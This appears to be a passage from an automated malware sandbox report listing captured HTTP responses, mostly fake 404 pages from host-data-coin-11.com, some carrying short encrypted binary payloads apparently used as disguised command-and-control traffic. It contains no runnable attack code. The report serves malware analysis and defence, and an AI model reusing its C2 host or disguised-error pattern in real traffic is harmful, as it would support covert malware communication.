                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 0f 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 09:44:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 